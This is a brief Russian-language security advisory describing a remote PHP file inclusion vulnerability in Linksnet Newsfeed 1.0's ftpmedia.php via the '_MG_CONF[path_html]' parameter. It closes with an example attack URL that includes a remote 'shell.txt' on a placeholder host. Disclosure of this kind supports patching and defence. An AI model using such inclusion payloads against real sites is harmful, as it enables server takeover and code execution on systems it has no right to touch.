Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Linksnet Newsfeed 1.0
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «_MG_CONF[path_html]» сценарием ftpmedia.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Успешное эксплуатирование уязвимости требует включение опции "register_globals" в конфигурационном файле PHP.
Пример:
http://victime.com/mediagallery/public_html/maint/ ftpmedia.php?_MG_CONF[path_html]= shell.txt?